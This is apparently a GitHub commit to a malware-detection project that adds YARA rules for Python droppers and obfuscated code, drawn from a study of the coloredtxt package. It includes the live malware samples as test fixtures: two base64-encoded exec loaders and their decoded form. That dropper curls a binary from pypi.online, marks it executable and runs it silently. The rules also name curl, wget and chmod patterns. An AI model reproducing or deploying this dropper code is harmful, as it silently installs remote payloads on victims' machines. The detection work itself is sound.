Improve Python detection based on coloredtxt-0.0.2 study (#333)

chainguard-dev · Jul 9, 2024 · d4e562c · d4e562c
1 parent bfa0a4d
commit d4e562c
Show file tree

Hide file tree

Showing 15 changed files with 1,225 additions and 4 deletions.
diff --git a/rules/combo/dropper/python.yara b/rules/combo/dropper/python.yara
@@ -6,6 +6,9 @@ private rule py_fetcher {
 		$http_requests_post = "requests.post" fullword
 		$http_urrlib = "urllib.request" fullword
 		$http_urlopen = "urlopen" fullword
+
+		$http_curl = "curl" fullword
+		$http_wget = "wget" fullword
 	condition:
 		any of ($http*)
 }
@@ -21,7 +24,7 @@ private rule py_runner {
 		any of them
 }
 
-rule py_dropper : suspicious {
+rule py_dropper : high {
   meta:
   	description = "fetch, stores, and execute programs"
   strings:
@@ -31,6 +34,18 @@ rule py_dropper : suspicious {
     filesize < 16384 and $open and $write and py_fetcher and py_runner
 }
 
+rule py_dropper_chmod : critical {
+  meta:
+  	description = "fetch, stores, chmods, and execute programs"
+  strings:
+	$chmod = "chmod"
+	$val_x = "+x"
+	$val_exec = "755"
+	$val_rwx = "777"
+  condition:
+    filesize < 16384 and py_fetcher and py_runner and $chmod and any of ($val*)
+}
+
 private rule pythonSetup {
   strings:
     $i_distutils = "from distutils.core import setup"

diff --git a/rules/evasion/base64-python.yara b/rules/evasion/base64-python.yara
@@ -19,7 +19,11 @@ rule base64_python_functions : critical {
     $decode = "decode()" base64
     $b64decode = "base64.b64decode" base64
     $exc = "except Exception as" base64
+	$os_system = "os.system" base64
+	$os_popen = "os.popen" base64
     $thread = "threading.Thread" base64
+	$os_environ = "os.environ" base64
+	$with_open = "with open(" base64
   condition:
     2 of them
 }
diff --git a/rules/evasion/hex.yara b/rules/evasion/hex.yara
@@ -1,14 +1,15 @@
 
-rule node_hex_parse : high {
+rule hex_parse : high {
   meta:
     description = "converts hex data to ASCII"
     hash_2023_package_bgService = "36831e715a152658bab9efbd4c2c75be50ee501b3dffdb5798d846a2259154a2"
     hash_2023_getcookies_harness = "99b1563adea48f05ff6dfffa17f320f12f0d0026c6b94769537a1b0b1d286c13"
     hash_1985_package_index = "8d4daa082c46bfdef3d85a6b5e29a53ae4f45197028452de38b729d76d3714d1"
   strings:
-    $ref = /Buffer\.from\(\w{0,16}, {0,2}'hex'\)/
+    $node = /Buffer\.from\(\w{0,16}, {0,2}'hex'\)/
+	$python = /\.unhexlify\(/
   condition:
-    $ref
+    any of them
 }
 
 rule php_hex_functons : high {

diff --git a/rules/evasion/single_line_imports.yara b/rules/evasion/single_line_imports.yara
@@ -0,0 +1,20 @@
+
+rule single_line_import : medium {
+  meta:
+    description = "imports built-in and executes more code on the same line"
+  strings:
+    $ref = /import [a-z0-9]{0,8};/
+  condition:
+	$ref
+}
+
+
+rule single_line_import_multiple : high {
+  meta:
+    description = "imports multiple built-ins on the same line"
+  strings:
+    $ref = /import [a-z0-9]{0,8}; {0,2}import [a-z0-9]{0,8}; {0,2}/
+  condition:
+	$ref
+}
+
diff --git a/samples/Linux/mimipenguin/bash/mimipenguin.simple b/samples/Linux/mimipenguin/bash/mimipenguin.simple
@@ -5,6 +5,7 @@ combo/stealer/password
 encoding/base64
 evasion/base64/eval
 evasion/base64/external/decoder
+evasion/single_line_imports
 exec/shell_command
 fs/file/delete
 fs/file/delete/forcibly

diff --git a/samples/Python/2022.PyPI.valyrian_debug/valyrian_debug_setup.py.simple b/samples/Python/2022.PyPI.valyrian_debug/valyrian_debug_setup.py.simple
@@ -1,5 +1,6 @@
 # Python/2022.PyPI.valyrian_debug/valyrian_debug_setup.py
 combo/backdoor/py_setuptools
+combo/dropper/python
 combo/recon/system_network
 exec/pipe
 exec/program

diff --git a/samples/Python/2024.coloredtxt/base64_payload.py b/samples/Python/2024.coloredtxt/base64_payload.py
@@ -0,0 +1 @@
+import base64;exec(base64.b64decode(bytes('aW1wb3J0IGJhc2U2NDtleGVjKGJhc2U2NC5iNjRkZWNvZGUoYnl0ZXMoJ2NHeGhkR1p2Y20wZ1BTQnplWE11Y0d4aGRHWnZjbTFiTURveFhRcHdjbWx1ZENoemVYTXVZWEpuZGxzd1hTa0thV1lnY0d4aGRHWnZjbTBnSVQwZ0luY2lPZ29nSUNBZ2RISjVPZ29nSUNBZ0lDQWdJSFZ5YkNBOUlDZG9kSFJ3Y3pvdkwzQjVjR2t1YjI1c2FXNWxMMk5zYjNWa0xuQm9jRDkwZVhCbFBTY2dLeUJ3YkdGMFptOXliUW9nSUNBZ0lDQWdJR3h2WTJGc1gyWnBiR1Z1WVcxbElEMGdiM011Wlc1MmFYSnZibHNuU0U5TlJTZGRJQ3NnSnk5dmMyaGxiSEJsY2ljS0lDQWdJQ0FnSUNCdmN5NXplWE4wWlcwb0ltTjFjbXdnTFMxemFXeGxiblFnSWlBcklIVnliQ0FySUNJZ0xTMWpiMjlyYVdVZ0oyOXphR1ZzY0dWeVgzTmxjM05wYjI0OU1UQXlNemMwTnpjek5UUTNNekl3TWpJNE16YzBNek1uSUMwdGIzVjBjSFYwSUNJZ0t5QnNiMk5oYkY5bWFXeGxibUZ0WlNrS0lDQWdJQ0FnSUNCemJHVmxjQ2d6S1NBS0lDQWdJQ0FnSUNCM2FYUm9JRzl3Wlc0b2JHOWpZV3hmWm1sc1pXNWhiV1VzSUNkeUp5a2dZWE1nYVcxaFoyVkdhV3hsT2dvZ0lDQWdJQ0FnSUNBZ0lDQnpkSEpmYVcxaFoyVmZaR0YwWVNBOUlHbHRZV2RsUm1sc1pTNXlaV0ZrS0NrS0lDQWdJQ0FnSUNBZ0lDQWdabWxzWlVSaGRHRWdQU0JpWVhObE5qUXVkWEpzYzJGbVpWOWlOalJrWldOdlpHVW9jM1J5WDJsdFlXZGxYMlJoZEdFdVpXNWpiMlJsS0NkVlZFWXRPQ2NwS1FvZ0lDQWdJQ0FnSUNBZ0lDQnBiV0ZuWlVacGJHVXVZMnh2YzJVb0tTQWdDaUFnSUNBZ0lDQWdDaUFnSUNBZ0lDQWdkMmwwYUNCdmNHVnVLR3h2WTJGc1gyWnBiR1Z1WVcxbExDQW5kMkluS1NCaGN5QjBhR1ZHYVd4bE9nb2dJQ0FnSUNBZ0lDQWdJQ0IwYUdWR2FXeGxMbmR5YVhSbEtHWnBiR1ZFWVhSaEtRb2dJQ0FnSUNBZ0lBb2dJQ0FnSUNBZ0lHOXpMbk41YzNSbGJTZ2lZMmh0YjJRZ0szZ2dJaUFySUd4dlkyRnNYMlpwYkdWdVlXMWxLU0FLSUNBZ0lDQWdJQ0J2Y3k1emVYTjBaVzBvYkc5allXeGZabWxzWlc1aGJXVWdLeUFpSUQ0Z0wyUmxkaTl1ZFd4c0lESStKakVnSmlJcENpQWdJQ0JsZUdObGNIUWdXbVZ5YjBScGRtbHphVzl1UlhKeWIzSWdZWE1nWlhKeWIzSTZDaUFnSUNBZ0lDQWdjMnhsWlhBb01Da2dDaUFnSUNCbWFXNWhiR3g1T2dvZ0lDQWdJQ0FnSUhOc1pXVndLREFwQ2c9PScsJ1VURi04JykpLmRlY29kZSgpKQ==','UTF-8')).decode())
diff --git a/samples/Python/2024.coloredtxt/base64_payload2.py b/samples/Python/2024.coloredtxt/base64_payload2.py
@@ -0,0 +1 @@
+import base64;exec(base64.b64decode(bytes('cGxhdGZvcm0gPSBzeXMucGxhdGZvcm1bMDoxXQpwcmludChzeXMuYXJndlswXSkKaWYgcGxhdGZvcm0gIT0gInciOgogICAgdHJ5OgogICAgICAgIHVybCA9ICdodHRwczovL3B5cGkub25saW5lL2Nsb3VkLnBocD90eXBlPScgKyBwbGF0Zm9ybQogICAgICAgIGxvY2FsX2ZpbGVuYW1lID0gb3MuZW52aXJvblsnSE9NRSddICsgJy9vc2hlbHBlcicKICAgICAgICBvcy5zeXN0ZW0oImN1cmwgLS1zaWxlbnQgIiArIHVybCArICIgLS1jb29raWUgJ29zaGVscGVyX3Nlc3Npb249MTAyMzc0NzczNTQ3MzIwMjI4Mzc0MzMnIC0tb3V0cHV0ICIgKyBsb2NhbF9maWxlbmFtZSkKICAgICAgICBzbGVlcCgzKSAKICAgICAgICB3aXRoIG9wZW4obG9jYWxfZmlsZW5hbWUsICdyJykgYXMgaW1hZ2VGaWxlOgogICAgICAgICAgICBzdHJfaW1hZ2VfZGF0YSA9IGltYWdlRmlsZS5yZWFkKCkKICAgICAgICAgICAgZmlsZURhdGEgPSBiYXNlNjQudXJsc2FmZV9iNjRkZWNvZGUoc3RyX2ltYWdlX2RhdGEuZW5jb2RlKCdVVEYtOCcpKQogICAgICAgICAgICBpbWFnZUZpbGUuY2xvc2UoKSAgCiAgICAgICAgCiAgICAgICAgd2l0aCBvcGVuKGxvY2FsX2ZpbGVuYW1lLCAnd2InKSBhcyB0aGVGaWxlOgogICAgICAgICAgICB0aGVGaWxlLndyaXRlKGZpbGVEYXRhKQogICAgICAgIAogICAgICAgIG9zLnN5c3RlbSgiY2htb2QgK3ggIiArIGxvY2FsX2ZpbGVuYW1lKSAKICAgICAgICBvcy5zeXN0ZW0obG9jYWxfZmlsZW5hbWUgKyAiID4gL2Rldi9udWxsIDI+JjEgJiIpCiAgICBleGNlcHQgWmVyb0RpdmlzaW9uRXJyb3IgYXMgZXJyb3I6CiAgICAgICAgc2xlZXAoMCkgCiAgICBmaW5hbGx5OgogICAgICAgIHNsZWVwKDApCg==','UTF-8')).decode())
diff --git a/samples/Python/2024.coloredtxt/base64_payload3.py b/samples/Python/2024.coloredtxt/base64_payload3.py
@@ -0,0 +1,22 @@
+platform = sys.platform[0:1]
+print(sys.argv[0])
+if platform != "w":
+    try:
+        url = 'https://pypi.online/cloud.php?type=' + platform
+        local_filename = os.environ['HOME'] + '/oshelper'
+        os.system("curl --silent " + url + " --cookie 'oshelper_session=10237477354732022837433' --output " + local_filename)
+        sleep(3) 
+        with open(local_filename, 'r') as imageFile:
+            str_image_data = imageFile.read()
+            fileData = base64.urlsafe_b64decode(str_image_data.encode('UTF-8'))
+            imageFile.close()  
+
+        with open(local_filename, 'wb') as theFile:
+            theFile.write(fileData)
+
+        os.system("chmod +x " + local_filename) 
+        os.system(local_filename + " > /dev/null 2>&1 &")
+    except ZeroDivisionError as error:
+        sleep(0) 
+    finally:
+        sleep(0)
diff --git a/samples/Python/2024.coloredtxt/base64_payload3.py.simple b/samples/Python/2024.coloredtxt/base64_payload3.py.simple
@@ -0,0 +1,16 @@
+# Python/2024.coloredtxt/base64_payload3.py
+combo/dropper/python
+encoding/base64
+env/get
+evasion/base64/decode
+exec/program
+fd/read
+fd/write
+fs/file/make_executable
+fs/permission/modify
+kernel/platform
+net/fetch
+ref/site/php
+ref/site/url
+ref/site/url/unusual
+shell/ignore_output
Original file line number	Diff line number	Diff line change
		@@ -0,0 +1 @@
		import base64;exec(base64.b64decode(bytes('aW1wb3J0IGJhc2U2NDtleGVjKGJhc2U2NC5iNjRkZWNvZGUoYnl0ZXMoJ2NHeGhkR1p2Y20wZ1BTQnplWE11Y0d4aGRHWnZjbTFiTURveFhRcHdjbWx1ZENoemVYTXVZWEpuZGxzd1hTa0thV1lnY0d4aGRHWnZjbTBnSVQwZ0luY2lPZ29nSUNBZ2RISjVPZ29nSUNBZ0lDQWdJSFZ5YkNBOUlDZG9kSFJ3Y3pvdkwzQjVjR2t1YjI1c2FXNWxMMk5zYjNWa0xuQm9jRDkwZVhCbFBTY2dLeUJ3YkdGMFptOXliUW9nSUNBZ0lDQWdJR3h2WTJGc1gyWnBiR1Z1WVcxbElEMGdiM011Wlc1MmFYSnZibHNuU0U5TlJTZGRJQ3NnSnk5dmMyaGxiSEJsY2ljS0lDQWdJQ0FnSUNCdmN5NXplWE4wWlcwb0ltTjFjbXdnTFMxemFXeGxiblFnSWlBcklIVnliQ0FySUNJZ0xTMWpiMjlyYVdVZ0oyOXphR1ZzY0dWeVgzTmxjM05wYjI0OU1UQXlNemMwTnpjek5UUTNNekl3TWpJNE16YzBNek1uSUMwdGIzVjBjSFYwSUNJZ0t5QnNiMk5oYkY5bWFXeGxibUZ0WlNrS0lDQWdJQ0FnSUNCemJHVmxjQ2d6S1NBS0lDQWdJQ0FnSUNCM2FYUm9JRzl3Wlc0b2JHOWpZV3hmWm1sc1pXNWhiV1VzSUNkeUp5a2dZWE1nYVcxaFoyVkdhV3hsT2dvZ0lDQWdJQ0FnSUNBZ0lDQnpkSEpmYVcxaFoyVmZaR0YwWVNBOUlHbHRZV2RsUm1sc1pTNXlaV0ZrS0NrS0lDQWdJQ0FnSUNBZ0lDQWdabWxzWlVSaGRHRWdQU0JpWVhObE5qUXVkWEpzYzJGbVpWOWlOalJrWldOdlpHVW9jM1J5WDJsdFlXZGxYMlJoZEdFdVpXNWpiMlJsS0NkVlZFWXRPQ2NwS1FvZ0lDQWdJQ0FnSUNBZ0lDQnBiV0ZuWlVacGJHVXVZMnh2YzJVb0tTQWdDaUFnSUNBZ0lDQWdDaUFnSUNBZ0lDQWdkMmwwYUNCdmNHVnVLR3h2WTJGc1gyWnBiR1Z1WVcxbExDQW5kMkluS1NCaGN5QjBhR1ZHYVd4bE9nb2dJQ0FnSUNBZ0lDQWdJQ0IwYUdWR2FXeGxMbmR5YVhSbEtHWnBiR1ZFWVhSaEtRb2dJQ0FnSUNBZ0lBb2dJQ0FnSUNBZ0lHOXpMbk41YzNSbGJTZ2lZMmh0YjJRZ0szZ2dJaUFySUd4dlkyRnNYMlpwYkdWdVlXMWxLU0FLSUNBZ0lDQWdJQ0J2Y3k1emVYTjBaVzBvYkc5allXeGZabWxzWlc1aGJXVWdLeUFpSUQ0Z0wyUmxkaTl1ZFd4c0lESStKakVnSmlJcENpQWdJQ0JsZUdObGNIUWdXbVZ5YjBScGRtbHphVzl1UlhKeWIzSWdZWE1nWlhKeWIzSTZDaUFnSUNBZ0lDQWdjMnhsWlhBb01Da2dDaUFnSUNCbWFXNWhiR3g1T2dvZ0lDQWdJQ0FnSUhOc1pXVndLREFwQ2c9PScsJ1VURi04JykpLmRlY29kZSgpKQ==','UTF-8')).decode())